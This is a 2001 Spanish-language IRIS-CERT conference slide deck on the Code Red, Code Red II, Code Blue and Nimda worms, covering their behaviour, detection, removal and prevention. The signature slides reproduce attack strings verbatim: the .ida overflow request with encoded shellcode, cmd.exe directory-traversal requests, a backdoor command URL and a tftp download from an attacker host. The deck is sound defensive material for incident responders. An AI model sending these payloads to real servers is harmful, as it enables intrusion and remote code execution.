Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001

[email protected]

Jornadas Técnicas RedIRIS 2001Pamplona, Octubre 2001

IX Grupo de coordinaciónIRIS-CERTÚltimas tendencias: Gusanos en equipos NT

JT2001 – gusanos en equipos NT- 2IRIS-CERT – [email protected]

Agenda

• Terminología• Gusanos

CODE RED (CRv1, CRv2a, CRv2b)http://www.cert.org/advisories/CA-2001-19.htmlhttp://www.cert.org/advisories/CA-2001-23.html

CODE RED IIhttp://www.cert.org/incident_notes/IN-2001-09.htmlhttp://www.incidents.org/react/code_redII.php

CODE BLUEhttp://xforce.iss.net/alerts/advise96.php

W32/NIMDA // “CONCEPT VIRUS (CV) V 5.”http://www.cert.org/advisories/CA-2001-26.htmlhttp://www.incidents.org/react/nimda.pdf

• Medidas preventivas


Terminología

• Gusano Programa que puede ejecutarse independientemente y que se puede propagar a otras máquinas. “The Shockware Rider” John Brunner 1975 Morris Worm (“The Internet Worm Incident”) 1988

• Virus Secuencia de código que se inserta en otros programas (“hosts”). Necesita la intervención humana para que se ejecute su programa “hosts”.


CODE RED.Sistemas afectados

• Windows NT con IIS 4.0/5.0 y Index Server 2.0 instalado

• Windows 2000 con IIS 4.0/5.0 y Index Server instaladohttp://www.microsoft.com/technet/security/bulletin

/MS01-044.asphttp://www.microsoft.com/technet/security/bulletin

/MS01-033.asp

• Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (instalan IIS)

• Cisco 600 series DSL routershttp://www.cisco.com/warp/public/707/cisco-code-red-

worm-pub.shtml


CODE RED.Descripción (CRv1)

• Actividad dependiente de la fecha del sistema: Día 1-19 Actividad de propagación

• Genera direcciones IP aleatorias IIS 4.0/5.0 + IDA infectada Cisco 600 series DSL routers El router deja de

reenviar paquetes No IIS/puerto 80 abierto logea

Se pueden producir re-infecciones Degradación de rendimiento y DoS

• Idioma Inglés (US)? Modificación páginas WWW Día 20-27 DoS contra www.whitehouse.gov Día 28-final mes Duerme infinitamente


CODE RED.Huellas

• En el sistema/default.ida?

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a

• En la red Tráfico desde nuestra máquina (infectada) al puerto

80/tcp de máquinas aleatorias


CODE RED.Variaciones

• CRv2a No modifica páginas Web Selección de víctimas aleatorias

• CRv2b No modifica páginas Web Selección de victimas mejorado Busca www.whitehouse.gov en DNS


CODE RED.Detección y Eliminación

• Aumento carga del sistema• Aumento conexiones externas al puerto 80/tcp hacia

direcciones aleatorias (netstat –na)• Code Red FAQ

http://incidents.org/react/code_red.php

• Gusano residente en memoria reiniciar la máquina No nos salva de posteriores re-infecciones El atacante sigue teniendo control total de la máquina

• Aplicar parches recomendados

• CodeRedscannerhttp://www.cymru.com/~robt/Tools/coderedscanner-2.5.tar.

gz• Retina CodeRed Scanner

http://www.eeye.com/html/Research/Tools/RetinaCodeRed.exe


CODE RED II.Sistemas afectados

• Windows 2000 con IIS 4.0/5.0 y Index Server instalado

• Windows NT 4.0 con IIS 4.0/5.0 y Index Server 2.0 instaladohttp://www.microsoft.com/technet/security/bulletin

/MS01-044.asphttp://www.microsoft.com/technet/security/bulletin

/MS01-033.asp

• Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (instalan IIS)

• Cisco 600 series DSL routershttp://www.cisco.com/warp/public/707/cisco-code-red-

worm-pub.shtml


CODE RED II.Descripción

• Chequea si el sistema ha sido infectado con anterioridad

• Actividad de propagación: La agresividad del escaneo depende del lenguaje del

sistema Escaneo de direcciones IP de la misma subred de clase A

o B (método probabilístico) Efectos colaterales de saturación

• Copia %SYSTEM%CMD.EXE (puerta trasera) c:\inetpub\scripts\root.exe c:\progra~1\common~1\systema\MSADC\root.exe d:\inetpub\scripts\root.exe d:\progra~1\common~1\systema\MSADC\root.exe

• Instala troyano explorer.exe (c:\ y d:\)

http: // IP/c/inetpub/scripts/root.exe/c+ARBITRARY_COMMAND


CODE RED II.Huellas

• En el sistemaGET /default.ida?

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0 0%u531b%u53ff%u0078%u0000%u00=a

• En la red Tráfico desde nuestra máquina (infectada) al puerto

80/tcp de otras máquinas vecinas


CODE RED II.Detección y eliminación

• Aumento carga del sistema• Aumento conexiones externas al puerto

80/tcp (netstat –na) (IPs vecinas)

• Code Red FAQ http://incidents.org/react/code_red.php

• AntiCodeRed2.vbshttp://www.incidents.org/react/AntiCodeRed2.vbs

• Microsofthttp://www.microsoft.com/technet/itsolutions/security/

tools/redfix.asp

• Formatear disco duro• Reinstalar software (aplicando parches

recomendados)


CODE BLUE.Sistemas afectados

• Máquinas con IIS 4.0/5.0 instalado

IIS Extended UNICODE Directory Traversal Vulnerability

http://xforce.iss.net/alerts/advise68.php

GET /.. [Encoded characters] ../winnt/system32/cmd.exe?/c+dir


CODE BLUE.Descripción

• Reside en memoria• Instala un Visual Basic Script (d.vbs) que

elimina el mapeo ISAPI para ficheros “.ida”, “.idq”, “.printer”

• Carga una DDL (httpext.dll) y un .EXE (svchost.exe)

• Propagación escaneo IPs vecinas• 10 am – 11 am GMT Ataque de inundación

contra una IP de China


CODE BLUE.Eliminación

• Con Regedit encontrar la clave del registroHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\Run

• Buscar y borrar la entrada del registro para c:\svchost.exe

• Eliminar los archivos c:\svchost.exe y c:\d.vbs• Reiniciar el ordenador • Aplicar parche recomendado


W32/NIMDA.Sistemas afectados

• Microsoft Windows 95, 98, ME, NT y 2000• Formas de propagarse

De cliente a cliente (vía mail/recursos de red compartidos)

http://www.cert.org/advisories/CA-2001-06.html De servidor Web a cliente (por navegación sobre

páginas modificadas) De cliente a servidor Web

• IIS Extended UNICODE Directory Traversal Vulnerability

http://www.kb.cert.org/vuls/id/111677• Puertas traseras dejadas por Code Red II y sadmin/IIShttp://www.cert.org/incident_notes/IN-2001-09.htmlhttp://www.cert.org/advisories/CA-2001-11.html


W32/NIMDA.Descripción

• Manda copias de sí mismo a todas las direcciones encontradas en la libreta de direcciones

• Escaneo de IPs aleatorias siguiendo método probabilístico Intenta transferirse a máquinas vulnerables (IIS) vía tftp

(69/udp)• Recorre todos los directorios en el sistema y se copia

como README.EML• Si encuentra archivos .html o .asp incluye código

Javascript que permitirá propagación al navegar por esas páginas

• Crea una cuenta “Guest” (NT y 2000) perteneciente al grupo “Administrator”

• Activa la compartición de la unidad c:\ (C$)• Crea troyanos de aplicaciones legítimas previamente

instaladas en el sistema


W32/NIMDA.Huellas

GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir


W32/NIMDA.Detección y eliminación

• Buscar root.exe Admin.dll Ficheros .eml y .nws extraños Log:

/c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200

x.x.x.x máquina atacante200 comando realizado con éxito

• Formatear disco duro• Reinstalar software (aplicando parches

recomendados)


Medidas preventivas

• Instalar sólo los servicios estrictamente necesarios• Permitir acceso sólo a los servidores públicos• Mantener las máquinas actualizadas con los últimos parches

de seguridad Hotfix (Microsoft)http://support.microsoft.com/support/kb/articles/q303/2/15.asp?

id=303215&sd=tech

• Desactivar extensiones dañinas en IIS Lockdown (Microsoft)http://www.microsoft.com/technet/security/tools/locktool.asp

• Bloquear el tráfico HTTP en función de la URL que se solicita (Cisco nbar+acl)http://www.cisco.com/warp/public/63/nimda.shtmlhttp://www.cisco.com/warp/public/63/nbar_acl_codered.shtml

• Cambiar el directorio base de la instalación de Windows NT• Chequear/controlar los logs de los servidores Web• Contestar/actuar rápidamente ante denuncias.

Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001

Documents

Transcript of Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001